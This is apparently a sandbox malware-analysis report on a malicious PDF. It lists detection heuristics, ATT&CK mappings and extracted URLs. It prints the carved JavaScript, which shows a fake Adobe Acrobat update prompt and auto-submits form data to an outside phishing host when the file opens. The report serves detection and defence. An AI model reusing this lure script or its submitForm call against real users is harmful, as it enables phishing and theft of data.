MALICIOUS
160
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1566.001 Spearphishing Attachment
T1041 Exfiltration Over C2 Channel
The PDF contains JavaScript that triggers an alert mimicking an Adobe Acrobat update and then automatically submits form data to the URL 'https://cardpayments.microransom.us/XTWtSMVJ6QmhjVVJXTlZKdVprOHpUVlJ3TTBwek1sQlpZVU5NU2toV1IwNVVjRUl3TlZWMmIzVnNUVmhNYVRWUloxWnpVM1EyYURCTVFrbG1ZelZsT0VSV1EwMVZkVTFHZWxOQ1RYcG9hRTlvTDFZdlJ6VnlWSFJwY1hCV01XUmpkVEpIUTNSaEx6UmpVMWs5TFMxUmFUVkdVWFEyWjNSb1NEQTJSRUp6WW5OUWJXTm5QVDA9LS0zMmRjNDYxMjBhYjdiOGViMDVhNDFjMzQxNjQ4MWRlMDAwYWE2OWU0?cid=858372367#FDF'. This behavior, combined with the 'credential_exfil' and 'submitForm' API calls, strongly suggests an attempt to phish for user credentials.
Machine Learning
- Nyx PDF Classifier malicious score 0.9477
Heuristics 8
-
PDF auto-runs JavaScript form submission on open critical PDF_OPENACTION_JS_SUBMITFORMPDF uses /OpenAction to run JavaScript that calls submitForm() with an external HTTP(S) URL. Opening the document triggers the outbound submission path without requiring a normal link click.
-
PDF JavaScript shows fake Acrobat updater prompt high PDF_FAKE_ACROBAT_UPDATE_LUREPDF JavaScript displays Acrobat/update-themed language such as a document rendering engine update or remote connection to Adobe servers. When paired with JavaScript or external submission, this is a social-engineering lure rather than benign document text.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Visual download / call-to-action button lure low SE_DOWNLOAD_BUTTONDocument contains a call-to-action phrase ('Click here to download', 'Download Now', etc.) — low-signal unless other findings point to a malicious workflow
-
External URI info PDF_URIPDF contains an external URL action
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://cardpayments.microransom.us/XTWtSMVJ6QmhjVVJXTlZKdVprOHpUVlJ3TTBwek1sQlpZVU5NU2toV1IwNVVjRUl3TlZWMmIzVnNUVmhNYVRWUloxWnpVM1EyYURCTVFrbG1ZelZsT0VSV1EwMVZkVTFHZWxOQ1RYcG9hRTlvTDFZdlJ6VnlWSFJwY1hCV01XUmpkVEpIUTNSaEx6UmpVMWs5TFMxUmFUVkdVWFEyWjNSb1NEQTJSRUp6WW5OUWJXTm5QVDA9LS0zMmRjNDYxMjBhYjdiOGViMDVhNDFjMzQxNjQ4MWRlMDAwYWE2OWU0?cid=858372367#FDF Referenced by PDF JavaScript
- https://cardpayments.microransom.us/XU2xGb2FXUXZXVk53UTFOcVZsTlBTVXB4TjNaamFITnBhVVpzVEhJcmRrSkZTRTF3YUZoUVpGbDRZM2RyVldKRlNrZ3piVVJCTVRsRE9YWkRjbEV6UlVZelExTldkVkJKU2tKQmNHeG1OMUpITDFGTWMyZEhkVkprTlRORVkyWTJNREJ2YmtwRmNrdExhMWxUUVhCc1kwcG1hSFUxZUZJMlNITjFNRXRNVldsRVJFaElkR0pDVEZwcGVtOUVXR05rYm5OVVVHWmlWbVowUzFKVFRtVk9hMHd3YjBnNWEyMWxORWhzYmtaYU1tWTJTbXBHY2xKSFV6QnRaSGt5YzFReExTMDRVV1pUTjBabU5USnVVRUpxT0RObFMxbE5kSEIzUFQwPS0tZTFkMTViMzViNGI5NTVmZGFhOTU1YTFlMDkwYWYxOTIwM2RiYjFiYQ==?cid=858372367Referenced by PDF JavaScript
- https://cardpayments.microransom.us/XZGt4SGRWSkNRbkJuWlZoblNGTkRVMGd5YVZGWFVWb3phV0Z4YldseFMwUjNhMDU0TVRJeldEQmphV0Z1TDJKNVJqWXJOamxsVjFGTVN5OVFia3hTUzFoQ1kzWk5hMUZvWjJobVNtUk5WV0o0UmtGaU5uSmtXVU5WYkdsNmRXNXhjbTU1V0hjMGRIa3JkWE5vTjA5R1MyOUNkelpMZVZsNWJIaFRPV1JDWTBNMVEzWlNaWGhPTkhob0swaEZTM0ZDVm5CMFl6VTJjV2RNWVM4d1VFWXhhalp6WWxWUU9YZG1VbEpYYmxsWldIWm5NM3AxTkM5dE4xSlRURmhZYVd4eExTMUdlVlJqZVhoV1dISmFXRTFyWlVaMU5XbEZRbmhSUFQwPS0tZDUzNzMyZjFiOGEwYTNjYTc2MjM5YzIzMTg2ZjJkMWZhNTYyZTEwMA==?cid=858372367Referenced by PDF JavaScript
- https://cardpayments.microransom.us/XY2tJemIwWXlLMHhwTjJoWlFrMUpUMG92VUVzMFlVcHhjblp1V1ZJelFrNW5RVEpZVWtoaE4xUnpjMlZsVkdaR1ZrdE5OeTlVWW5VMmVWTjJNVTFhYVZWd1drWm1VVVZqVVZOS2EyeEhjbUpsVkZSYVFsSktOVFJqZVhodlNFRjBkeXQxV25CcWJGUjFWSEY1UzJKeFYwdFVOMXBKUTJWVU1WVXJWSEprWVhscVYzSTFSa016V0dObFVXVjNWVmxXVGt4VU1uQmhXWEZRY1hnMGQzSXlXa3R1YWt0TWIxZzRWSFZ0WTJvd2JHUk5kVUUyUzBKWVZEWjFUemg2ZDBJd0xTMVdSalpKUVc5bVZsQk1kRmRsV2pKTVNsUTRNRlYzUFQwPS0tNjhmMzBlMzAxOGU5MGNlNjlhNmQ3MGViYjQwYjA3NjBjMmUyNjE3MQ==?cid=858372367Referenced by PDF JavaScript
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by PDF JavaScript
- http://ns.adobe.com/xap/1.0/Referenced by PDF JavaScript
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/tiff/1.0/Referenced by PDF JavaScript
- http://ns.adobe.com/exif/1.0/Referenced by PDF JavaScript
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0012_000.js |
pdf-javascript-stream | PDF /JS object 12 at offset 0x180A | 605 bytes |
SHA-256: 00688aada00babbb85e830a956f70f5793ef688460a3348f3df63365226c95fd |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function docOpened()
{
app.alert({cMsg: 'We need to update your document rendering engine. Click OK to continue, when prompted allow remote connection to Adobe servers.', cTitle: 'Adobe Acrobat Updater',nIcon: 3});
app.doc.submitForm('https://cardpayments.microransom.us/XTWtSMVJ6QmhjVVJXTlZKdVprOHpUVlJ3TTBwek1sQlpZVU5NU2toV1IwNVVjRUl3TlZWMmIzVnNUVmhNYVRWUloxWnpVM1EyYURCTVFrbG1ZelZsT0VSV1EwMVZkVTFHZWxOQ1RYcG9hRTlvTDFZdlJ6VnlWSFJwY1hCV01XUmpkVEpIUTNSaEx6UmpVMWs5TFMxUmFUVkdVWFEyWjNSb1NEQTJSRUp6WW5OUWJXTm5QVDA9LS0zMmRjNDYxMjBhYjdiOGViMDVhNDFjMzQxNjQ4MWRlMDAwYWE2OWU0?cid=858372367#FDF');
}
docOpened();
|
|||
javascript_obj0012_001.js |
pdf-javascript-stream | PDF /JS object 12 at offset 0x1831 | 103862 bytes |
SHA-256: 2d149050209d0c7caaa89f48fee6732d1b520a48056dc3d0388f8c847d95cf01 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 8 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function docOpened()
{
app.alert({cMsg: 'We need to update your document rendering engine. Click OK to continue, when prompted allow remote connection to Adobe servers.', cTitle: 'Adobe Acrobat Updater',nIcon: 3});
app.doc.submitForm('https://cardpayments.microransom.us/XTWtSMVJ6QmhjVVJXTlZKdVprOHpUVlJ3TTBwek1sQlpZVU5NU2toV1IwNVVjRUl3TlZWMmIzVnNUVmhNYVRWUloxWnpVM1EyYURCTVFrbG1ZelZsT0VSV1EwMVZkVTFHZWxOQ1RYcG9hRTlvTDFZdlJ6VnlWSFJwY1hCV01XUmpkVEpIUTNSaEx6UmpVMWs5TFMxUmFUVkdVWFEyWjNSb1NEQTJSRUp6WW5OUWJXTm5QVDA9LS0zMmRjNDYxMjBhYjdiOGViMDVhNDFjMzQxNjQ4MWRlMDAwYWE2OWU0?cid=858372367#FDF');
}
docOpened();
endstream
endobj
%QDF: ignore_newline
13 0 obj
483
endobj
%% Page 1
%% Original object ID: 16 0
14 0 obj
<<
/Annots 15 0 R
/Contents 16 0 R
/CropBox [
0
0
612
792
]
/MediaBox [
0
0
612
792
]
/Parent 8 0 R
/Resources <<
/Font <<
/C0_0 18 0 R
/C0_1 19 0 R
/C0_2 20 0 R
>>
/ProcSet [
/PDF
/Text
/ImageC
]
/XObject <<
/Im0 21 0 R
/Im1 23 0 R
/Im2 25 0 R
>>
>>
/Rotate 0
/Type /Page
>>
endobj
%% Original object ID: 32 0
15 0 obj
[
27 0 R
28 0 R
29 0 R
]
endobj
%% Contents for page 1
%% Original object ID: 18 0
16 0 obj
<<
/Length 17 0 R
>>
stream
q
404.8937073 0 0 269.9337463 107.3061676 460.5401001 cm
/Im0 Do
Q
BT
/C0_0 12 Tf
1 0 0.2679 1 116.07 441.387 Tm
<00350049004a005400010045005000440056004e0046004f00550001004a005400010046004f00440053005a0051005500460045000100560054004a004f0048000100220045005000430046000100340046004400560053004600010024004d005000560045>Tj
/C0_1 12 Tf
<00e4>Tj
/C0_0 12 Tf
<000f0001>Tj
4.179 -15.6 Td
<0024004d004a0044004c000100430046004d005000580001005500500001005400460044005600530046004d005a00010057004a00460058000100440050004f00550046004f00550054000f0001>Tj
ET
/TouchUp_TextEdit MP
BT
0 i
/C0_2 10 Tf
158.323 52.725 Td
<0031004d00460042005400460001004f005000550046001b000100340050004e00460001005800460043004e0042004a004d00010044004d004a0046004f0055005400010042005300460001004f00500055000100440050004e005100420055004a0043004d004600010058004a005500490001002200450050004300460001>Tj
0 -12 TD
<00340046004400560053004600010024004d00500056004500e4000f0001002a004700010055004900420055000100490042005100510046004f0054000d0001004500500058004f004d005000420045000100550049004600010047004a004d004600010042004f00450001005000510046004f00010050004f0001>Tj
T*
<002500460054004c005500500051000f>Tj
ET
q
56.1389923 0 0 43.9851837 94.3450775 23.5263672 cm
/Im1 Do
Q
q
157.0927124 0 0 36.2528992 230.401001 342.7270813 cm
/Im2 Do
Q
endstream
endobj
17 0 obj
1300
endobj
%% Original object ID: 40 0
18 0 obj
<<
/BaseFont /KUFUSM+HiraKakuProN-W6
/DescendantFonts 30 0 R
/Encoding /Identity-H
/Subtype /Type0
/ToUnicode 31 0 R
/Type /Font
>>
endobj
%% Original object ID: 42 0
19 0 obj
<<
/BaseFont /VGWIQQ+HiraKakuProN-W6
/DescendantFonts 33 0 R
/Encoding /Identity-H
/Subtype /Type0
/ToUnicode 34 0 R
/Type /Font
>>
endobj
%% Original object ID: 44 0
20 0 obj
<<
/BaseFont /JSIEEO+HiraKakuProN-W6
/DescendantFonts 36 0 R
/Encoding /Identity-H
/Subtype /Type0
/ToUnicode 37 0 R
/Type /Font
>>
endobj
%% Original object ID: 25 0
21 0 obj
<<
/BitsPerComponent 8
/ColorSpace /DeviceRGB
/Filter /DCTDecode
/Height 400
/Metadata 39 0 R
/Name /X
/Subtype /Image
/Type /XObject
/Width 600
/Length 22 0 R
>>
stream
���� JFIF �� JFIF �� C &""&0-0>>T�� C &""&0-0>>T�� � X " ��
�� � } !1A Qa "q 2��� #B�� R��$3br�
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz���������������������������������������������������������������������������
�� � w !1 AQ aq "2� B���� #3R� br�
$4�%� &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�������������������������������������������������������������������������� ? ��sKL� ^�����h� R� ( Դ�p4
... (truncated)
|
|||
font_00_cff_off000196db.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x196DB | 4575 bytes |
SHA-256: 9340d372ad75a105fdb1627a30e96f892e0dc7d9588c0150cf06b4fa72281cc0 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.